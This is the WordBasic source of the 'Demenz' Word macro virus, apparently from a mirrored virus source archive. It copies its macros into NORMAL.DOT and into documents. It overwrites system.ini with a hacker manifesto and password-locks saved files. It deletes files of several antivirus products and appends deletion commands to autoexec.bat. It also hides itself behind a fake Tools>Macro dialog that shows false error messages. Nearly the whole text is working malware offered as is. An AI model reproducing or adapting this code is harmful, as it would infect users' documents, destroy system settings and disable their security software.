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synced 2025-02-07 07:21:58 +00:00
286 lines
8.0 KiB
286 lines
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Name: Demenz
Author: Serialkiller
Resident: No
Encryption: Yes
Steahlt: Yes
The virus have 5 macros:
- AutoOpen
- AutoNew
- Demenz
- ToolsMacro
- FileSave
On Error Resume Next
n$ = DefaultDir$(2) + "\NORMAL.DOT"
f$ = FileName$()
If GetAttr(n$) < 32 Then Goto del
a = CountMacros(0)
If a > 0 Then
For b = 1 To a
If MacroName$(b, 0) = "AutoOpen" Then c = 1
Next b
End If
If c <> 1 Then
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoOpen", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoNew", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "Demenz", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "FileSave", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "ToolsMacro", .Tab = 3
End If
aa = CountMacros(1)
If aa > 0 Then
For bb = 1 To aa
If MacroName$(bb, 1) = "AutoOpen" Then cc = 1
Next bb
End If
If cc <> 1 Then
FileSaveAs .Format = 1
fm$ = FileName$() + ":AutoOpen"
MacroCopy "AutoOpen", fm$
fm$ = FileName$() + ":AutoNew"
MacroCopy "AutoNew", fm$
fm$ = FileName$() + ":Demenz"
MacroCopy "Demenz", fm$
fm$ = FileName$() + ":FileSave"
MacroCopy "FileSave", fm$
fm$ = FileName$() + ":ToolsMacro"
MacroCopy "ToolsMacro", fm$
End If
End Sub
On Error Goto Finish
DisableInput 1
Call AutoOpen
On Error Resume Next
SetAttr "C:\Windows\system.ini", 0
Open "C:\Windows\system.ini" For Output As #1
Print #1, "[*****************************]"
Print #1, "[***The Hacker<65>s Manifesto ***]"
Print #1, "[*****************************]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[This is our world now ...]"
Print #1, "[the world of the electron and the switch,]"
Print #1, "[the beaty of the baud. We make use of a servive already]"
Print #1, "[existing without paying for what could be dirt-cheap]"
Print #1, "[if it wasn<73>t run by profiteering gluttons, and you]"
Print #1, "[callus criminals. We explore... and YOU call us]"
Print #1, "[criminals. We seek after knowledge... and YOU,]"
Print #1, "[call us criminals. We exist without skin color]"
Print #1, "[without nationality, without religious bias...]"
Print #1, "[and YOU call us criminals.]"
Print #1, "[YOU build atomic bombs, YOU wage wars, YOU murder,]"
Print #1, "[cheat, and let lie to us and try to make us belive it<69>s]"
Print #1, "[for OUR OWN GOOD, yet we<77>re the criminals.]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[Yes I<>m a criminal. My crime is that of coriosity.]"
Print #1, "[My crime is that of judging people by what they say]"
Print #1, "[and think, not what they look like. My crime is that]"
Print #1, "[of outsmarting YOU, something that YOU will never]"
Print #1, "[forgive me for.]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[I am a hacker, and this is my manifesto.]"
Print #1, "[YOU may stop this individual, but YOU can<61>t stop us ALL]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[Serialkiller present<6E>s]"
Print #1, "[]"
Print #1, "[THE Demenz virus]"
Print #1, "[Greetings to all membaz aff the Codebreakers]"
Close #1
End Sub
On Error Resume Next
FileSaveAs .Password = "Concetta"
End Sub
On Error Resume Next
SE1$ = Files$("C:\PC-Cillin 95\Scan32.dll")
If SE1$ = "" Then Goto AV2
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
Print #1, "del c:\pc-cil~1\*.dll >nul"
Close #1
Kill "C:\PC-Cillin 95\Lpt$vpn.*"
SE2$ = Files$("C:\PC-Cillin 97\Scan32.dll")
If SE2$ = "" Then Goto AV3
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
Print #1, "del c:\pc-cil~1\*.dll >nul"
Close #1
Kill "C:\PC-Cillin 97\Lpt$vpn.*"
SE3$ = Files$("C:\Tsc\PC-Cillin 97\Scan32.dll")
If SE3$ = "" Then Goto AV4
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\tsc\pc-cil~1\*.* >nul"
Print #1, "del c:\tsc\pc-cil~1\*.dll >nul"
Close #1
Kill "C:\Tsc\PC-Cillin 97\Lpt$vpn.*"
SE4$ = Files$("C:\Zlockav\Gsav.dat")
If SE4$ = "" Then Goto AV5
Kill SE4$
Kill "C:\Zlockav\Gsav.cas"
SE5$ = Files$("C:\VB7\Virus.txt")
If SE5$ = "" Then Goto AV6
Kill SE5$
SE6$ = Files$("C:\Program Files\Norton AntiVirus\Viruscan.dat")
If SE6$ = "" Then Goto AV7
Kill SE6$
Kill "C:\Program Files\Symantec\Symevnt.386"
SE7$ = Files$("C:\Program Files\McAfee\VirusScan95\Scan.dat")
If SE7$ = "" Then Goto AV8
Kill SE7$
Kill "C:\Program Files\McAfee\VirusScan95\Mcscan32.dll"
SE8$ = Files$("C:\Program Files\McAfee\VirusScan\Scan.dat")
If SE8$ = "" Then Goto AV9
Kill SE8$
Kill "C:\Program Files\McAfee\VirusScan\Mcscan32.dll"
SE9$ = Files$("C:\Program Files\Command Software\F-PROT95\Sign.def")
If SE9$ = "" Then Goto AV10
Kill SE9$
Kill "C:\Program Files\Command Software\F-PROT95\Dvp.vxd"
SE10$ = Files$("C:\Program Files\AntiViral Toolkit Pro\Avp32.exe")
If SE10$ = "" Then Goto AV11
Kill SE10$
Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
SE11$ = Files$("C:\TBAVW95\Tbscan.sig")
If SE11$ = "" Then Goto joke
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\Tbavw95\*.* >nul"
Print #1, "del c:\Tbavw95\Tb*.* >nul"
Close #1
Kill "C:\Tbavw95\Tbavw95.vxd"
SE12$ = Files$("C:\Programme\Norton AntiVirus\*.dat")
If SE12$ = "" Then Goto exit
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\Programme Norton AntiVirus\*.* >nul"
Print #1, "del c:\Norton AntiVirus\*.* >nul"
Close #1
Kill "C:\Programme\Norton AntiVirus\*.dat"
Kill "C:\Programme\Symantec\Symevnt.386"
End Sub
B$ = "Out of memory."
C$ = "WordBasic Err = 7"
Dim ComboBox1$(0)
ComboBox1$(0) = ""
Dim ListBox1$(0)
ListBox1$(0) = ""
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot(Global Template)"
Begin Dialog UserDialog 442, 320, "Macro"
CancelButton 290, 38, 141, 21
PushButton 290, 14, 141, 21, "Rec&ord...", .D2
PushButton 290, 72, 141, 21, "&Run", .D3
PushButton 290, 97, 141, 21, "&Cancel", .D4
PushButton 290, 125, 141, 21, "&Delete", .D5
PushButton 290, 161, 141, 21, "Or&ganizer...", .D6
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 93, 13, "Macros &Available In:", .T1
Text 7, 259, 109, 13, "Description:", .T2
Text 7, 7, 93, 13, "&Macro Name:", .T3
ListBox 7, 276, 425, 38, ListBox1$(), .LB1
DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2
End Dialog
Redim dlg As UserDialog
x = Dialog(dlg)
Select Case x
Case 0
Case 1
MsgBox B$, C$, 48
Goto A
Case 2
MsgBox B$, C$, 48
Goto A
Case 3
MsgBox B$, C$, 48
Goto A
Case 4
MsgBox B$, C$, 48
Goto A
Case 5
MsgBox B$, C$, 48
Goto A
End Select
End Sub